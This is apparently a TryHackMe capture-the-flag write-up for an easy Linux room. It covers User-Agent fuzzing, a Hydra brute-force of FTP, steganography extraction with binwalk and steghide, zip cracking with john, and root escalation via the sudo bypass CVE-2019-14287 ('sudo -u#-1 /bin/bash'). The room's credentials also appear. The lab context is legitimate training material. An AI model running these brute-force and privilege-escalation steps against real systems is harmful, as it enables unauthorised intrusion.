Platform: TryHackMe
OS: Linux
Difficulty: Easy
Tags: web user-agent ftp hydra steganography sudo cve linux
Date: 2026-05
Linux machine where the web server responds differently based on the User-Agent header. Fuzzing the User-Agent reveals a username and hints towards FTP credentials. Brute-forced FTP with Hydra, found images containing hidden data via steganography, recovered a password, SSH'd in as james, and escalated to root via CVE-2019-14287 — a sudo version vulnerability allowing UID bypass.
nmap -sV -sC -p- --min-rate 5000 <TARGET_IP>PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1
80/tcp open http Apache httpd 2.4.29
The landing page says to use your "codename" as the User-Agent. Tried letters A-Z:
curl -A "C" http://<TARGET_IP>/Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff.
Username discovered: chris. Another agent mentioned: J (james).
hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://<TARGET_IP>[21][ftp] host: <TARGET_IP> login: chris password: crystal
ftp <TARGET_IP>
# Login: chris / crystal
lsTo_agentJ.txt
cute-alien.jpg
cutie.png
get To_agentJ.txt
get cute-alien.jpg
get cutie.pngTo_agentJ.txt mentions a fake/real picture with hidden data and a password is "stored in the fake one."
cutie.png — checked for hidden files with binwalk:
binwalk cutie.pngDECIMAL HEXADECIMAL DESCRIPTION
0 0x0 PNG image
34562 0x8702 Zip archive data
binwalk -e cutie.pngExtracted a zip — password protected. Cracked with john:
zip2john 8702.zip > zip.hash
john zip.hash --wordlist=/usr/share/wordlists/rockyou.txtalien (8702.zip)
Inside the zip: To_agentR.txt — message from Agent R, mentions the password is "Area51".
cute-alien.jpg — checked with steghide using the extracted password:
steghide extract -sf cute-alien.jpg
# Passphrase: Area51Message from james: Hey buddy, its james here...
username: james
password: hackerrules!
ssh james@<TARGET_IP>
cat user_flag.txtThere's also an image Alien_autospy.jpg in James's home:
scp james@<TARGET_IP>:Alien_autospy.jpg .Reverse image search identifies it as the Roswell alien autopsy photo — the answer to a room question.
sudo -lUser james may run the following commands on agent-sudo:
(ALL, !root) /bin/bash
The (ALL, !root) looks like it restricts root access — but this is vulnerable to CVE-2019-14287.
In sudo versions < 1.8.28, specifying UID -1 or 4294967295 bypasses the !root restriction:
sudo -u#-1 /bin/bashroot@agent-sudo:~# whoami
root
cat /root/root.txt- HTTP User-Agent headers can control application behaviour — always fuzz them
- Steganography is common in easy/medium CTFs — check all images with
binwalkandsteghide - Extracting zips often needs
binwalk -ethenzip2john+johnfor password cracking (ALL, !root)in sudoers looks restrictive but is actually vulnerable to CVE-2019-14287- Chain of clues: User-Agent → FTP creds → stego → SSH creds → sudo CVE